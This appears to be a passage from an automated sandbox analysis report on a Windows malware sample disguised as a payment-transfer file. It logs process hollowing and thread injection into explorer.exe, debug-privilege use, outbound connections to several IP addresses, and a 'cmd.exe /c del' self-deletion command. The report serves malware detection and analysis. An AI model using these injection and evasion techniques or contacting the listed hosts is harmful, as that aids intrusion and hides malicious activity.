Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CAA537 mov eax, dword ptr fs:[00000030h]	9_2_04CAA537
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C54D3B mov eax, dword ptr fs:[00000030h]	9_2_04C54D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C54D3B mov eax, dword ptr fs:[00000030h]	9_2_04C54D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C54D3B mov eax, dword ptr fs:[00000030h]	9_2_04C54D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C68EC7 mov eax, dword ptr fs:[00000030h]	9_2_04C68EC7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C536CC mov eax, dword ptr fs:[00000030h]	9_2_04C536CC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CDFEC0 mov eax, dword ptr fs:[00000030h]	9_2_04CDFEC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF8ED6 mov eax, dword ptr fs:[00000030h]	9_2_04CF8ED6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C376E2 mov eax, dword ptr fs:[00000030h]	9_2_04C376E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C516E0 mov ecx, dword ptr fs:[00000030h]	9_2_04C516E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CBFE87 mov eax, dword ptr fs:[00000030h]	9_2_04CBFE87
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF0EA5 mov eax, dword ptr fs:[00000030h]	9_2_04CF0EA5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF0EA5 mov eax, dword ptr fs:[00000030h]	9_2_04CF0EA5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF0EA5 mov eax, dword ptr fs:[00000030h]	9_2_04CF0EA5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA46A7 mov eax, dword ptr fs:[00000030h]	9_2_04CA46A7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]	9_2_04C37E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]	9_2_04C37E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]	9_2_04C37E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]	9_2_04C37E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]	9_2_04C37E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]	9_2_04C37E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CEAE44 mov eax, dword ptr fs:[00000030h]	9_2_04CEAE44
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CEAE44 mov eax, dword ptr fs:[00000030h]	9_2_04CEAE44
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3766D mov eax, dword ptr fs:[00000030h]	9_2_04C3766D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]	9_2_04C4AE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]	9_2_04C4AE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]	9_2_04C4AE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]	9_2_04C4AE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]	9_2_04C4AE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2C600 mov eax, dword ptr fs:[00000030h]	9_2_04C2C600
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2C600 mov eax, dword ptr fs:[00000030h]	9_2_04C2C600
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2C600 mov eax, dword ptr fs:[00000030h]	9_2_04C2C600
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C58E00 mov eax, dword ptr fs:[00000030h]	9_2_04C58E00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1608 mov eax, dword ptr fs:[00000030h]	9_2_04CE1608
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5A61C mov eax, dword ptr fs:[00000030h]	9_2_04C5A61C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5A61C mov eax, dword ptr fs:[00000030h]	9_2_04C5A61C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2E620 mov eax, dword ptr fs:[00000030h]	9_2_04C2E620
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CDFE3F mov eax, dword ptr fs:[00000030h]	9_2_04CDFE3F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C637F5 mov eax, dword ptr fs:[00000030h]	9_2_04C637F5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C38794 mov eax, dword ptr fs:[00000030h]	9_2_04C38794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA7794 mov eax, dword ptr fs:[00000030h]	9_2_04CA7794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA7794 mov eax, dword ptr fs:[00000030h]	9_2_04CA7794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA7794 mov eax, dword ptr fs:[00000030h]	9_2_04CA7794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3EF40 mov eax, dword ptr fs:[00000030h]	9_2_04C3EF40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3FF60 mov eax, dword ptr fs:[00000030h]	9_2_04C3FF60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF8F6A mov eax, dword ptr fs:[00000030h]	9_2_04CF8F6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF070D mov eax, dword ptr fs:[00000030h]	9_2_04CF070D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF070D mov eax, dword ptr fs:[00000030h]	9_2_04CF070D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5A70E mov eax, dword ptr fs:[00000030h]	9_2_04C5A70E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5A70E mov eax, dword ptr fs:[00000030h]	9_2_04C5A70E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4F716 mov eax, dword ptr fs:[00000030h]	9_2_04C4F716
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CBFF10 mov eax, dword ptr fs:[00000030h]	9_2_04CBFF10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CBFF10 mov eax, dword ptr fs:[00000030h]	9_2_04CBFF10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C24F2E mov eax, dword ptr fs:[00000030h]	9_2_04C24F2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C24F2E mov eax, dword ptr fs:[00000030h]	9_2_04C24F2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5E730 mov eax, dword ptr fs:[00000030h]	9_2_04C5E730
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]	9_2_04CBB8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CBB8D0 mov ecx, dword ptr fs:[00000030h]	9_2_04CBB8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]	9_2_04CBB8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]	9_2_04CBB8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]	9_2_04CBB8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]	9_2_04CBB8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C258EC mov eax, dword ptr fs:[00000030h]	9_2_04C258EC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C29080 mov eax, dword ptr fs:[00000030h]	9_2_04C29080
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA3884 mov eax, dword ptr fs:[00000030h]	9_2_04CA3884
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA3884 mov eax, dword ptr fs:[00000030h]	9_2_04CA3884
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]	9_2_04C520A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]	9_2_04C520A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]	9_2_04C520A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]	9_2_04C520A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]	9_2_04C520A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]	9_2_04C520A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C690AF mov eax, dword ptr fs:[00000030h]	9_2_04C690AF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5F0BF mov ecx, dword ptr fs:[00000030h]	9_2_04C5F0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5F0BF mov eax, dword ptr fs:[00000030h]	9_2_04C5F0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5F0BF mov eax, dword ptr fs:[00000030h]	9_2_04C5F0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C40050 mov eax, dword ptr fs:[00000030h]	9_2_04C40050
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C40050 mov eax, dword ptr fs:[00000030h]	9_2_04C40050
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF1074 mov eax, dword ptr fs:[00000030h]	9_2_04CF1074
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE2073 mov eax, dword ptr fs:[00000030h]	9_2_04CE2073
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF4015 mov eax, dword ptr fs:[00000030h]	9_2_04CF4015
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF4015 mov eax, dword ptr fs:[00000030h]	9_2_04CF4015
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA7016 mov eax, dword ptr fs:[00000030h]	9_2_04CA7016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA7016 mov eax, dword ptr fs:[00000030h]	9_2_04CA7016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA7016 mov eax, dword ptr fs:[00000030h]	9_2_04CA7016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]	9_2_04C5002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]	9_2_04C5002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]	9_2_04C5002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]	9_2_04C5002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]	9_2_04C5002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]	9_2_04C3B02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]	9_2_04C3B02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]	9_2_04C3B02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]	9_2_04C3B02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CB41E8 mov eax, dword ptr fs:[00000030h]	9_2_04CB41E8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2B1E1 mov eax, dword ptr fs:[00000030h]	9_2_04C2B1E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2B1E1 mov eax, dword ptr fs:[00000030h]	9_2_04C2B1E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2B1E1 mov eax, dword ptr fs:[00000030h]	9_2_04C2B1E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5A185 mov eax, dword ptr fs:[00000030h]	9_2_04C5A185
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4C182 mov eax, dword ptr fs:[00000030h]	9_2_04C4C182
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C52990 mov eax, dword ptr fs:[00000030h]	9_2_04C52990
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C561A0 mov eax, dword ptr fs:[00000030h]	9_2_04C561A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C561A0 mov eax, dword ptr fs:[00000030h]	9_2_04C561A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA69A6 mov eax, dword ptr fs:[00000030h]	9_2_04CA69A6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]	9_2_04CA51BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]	9_2_04CA51BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]	9_2_04CA51BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]	9_2_04CA51BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4B944 mov eax, dword ptr fs:[00000030h]	9_2_04C4B944
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C4B944 mov eax, dword ptr fs:[00000030h]	9_2_04C4B944
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2C962 mov eax, dword ptr fs:[00000030h]	9_2_04C2C962
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2B171 mov eax, dword ptr fs:[00000030h]	9_2_04C2B171
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2B171 mov eax, dword ptr fs:[00000030h]	9_2_04C2B171
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C29100 mov eax, dword ptr fs:[00000030h]	9_2_04C29100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C29100 mov eax, dword ptr fs:[00000030h]	9_2_04C29100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C29100 mov eax, dword ptr fs:[00000030h]	9_2_04C29100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]	9_2_04C44120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]	9_2_04C44120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]	9_2_04C44120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]	9_2_04C44120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C44120 mov ecx, dword ptr fs:[00000030h]	9_2_04C44120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5513A mov eax, dword ptr fs:[00000030h]	9_2_04C5513A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5513A mov eax, dword ptr fs:[00000030h]	9_2_04C5513A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C52ACB mov eax, dword ptr fs:[00000030h]	9_2_04C52ACB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C52AE4 mov eax, dword ptr fs:[00000030h]	9_2_04C52AE4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5D294 mov eax, dword ptr fs:[00000030h]	9_2_04C5D294
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5D294 mov eax, dword ptr fs:[00000030h]	9_2_04C5D294
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]	9_2_04C252A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]	9_2_04C252A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]	9_2_04C252A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]	9_2_04C252A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]	9_2_04C252A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3AAB0 mov eax, dword ptr fs:[00000030h]	9_2_04C3AAB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3AAB0 mov eax, dword ptr fs:[00000030h]	9_2_04C3AAB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5FAB0 mov eax, dword ptr fs:[00000030h]	9_2_04C5FAB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]	9_2_04C29240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]	9_2_04C29240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]	9_2_04C29240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]	9_2_04C29240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CEEA55 mov eax, dword ptr fs:[00000030h]	9_2_04CEEA55
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CB4257 mov eax, dword ptr fs:[00000030h]	9_2_04CB4257
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CDB260 mov eax, dword ptr fs:[00000030h]	9_2_04CDB260
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CDB260 mov eax, dword ptr fs:[00000030h]	9_2_04CDB260
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF8A62 mov eax, dword ptr fs:[00000030h]	9_2_04CF8A62
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C6927A mov eax, dword ptr fs:[00000030h]	9_2_04C6927A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C38A0A mov eax, dword ptr fs:[00000030h]	9_2_04C38A0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C25210 mov eax, dword ptr fs:[00000030h]	9_2_04C25210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C25210 mov ecx, dword ptr fs:[00000030h]	9_2_04C25210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C25210 mov eax, dword ptr fs:[00000030h]	9_2_04C25210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C25210 mov eax, dword ptr fs:[00000030h]	9_2_04C25210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2AA16 mov eax, dword ptr fs:[00000030h]	9_2_04C2AA16
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2AA16 mov eax, dword ptr fs:[00000030h]	9_2_04C2AA16
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C43A1C mov eax, dword ptr fs:[00000030h]	9_2_04C43A1C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C64A2C mov eax, dword ptr fs:[00000030h]	9_2_04C64A2C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C64A2C mov eax, dword ptr fs:[00000030h]	9_2_04C64A2C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA53CA mov eax, dword ptr fs:[00000030h]	9_2_04CA53CA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CA53CA mov eax, dword ptr fs:[00000030h]	9_2_04CA53CA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]	9_2_04C503E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]	9_2_04C503E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]	9_2_04C503E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]	9_2_04C503E2

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 210.152.86.132 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.52.105.123 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 50.116.112.43 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 176.74.27.137 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.199.108.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 164.155.144.220 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.27.88.111 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Memory written: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 330000

Jump to behavior

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'			Jump to behavior

Source: explorer.exe, 00000005.00000002.741529190.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp, explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp	Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
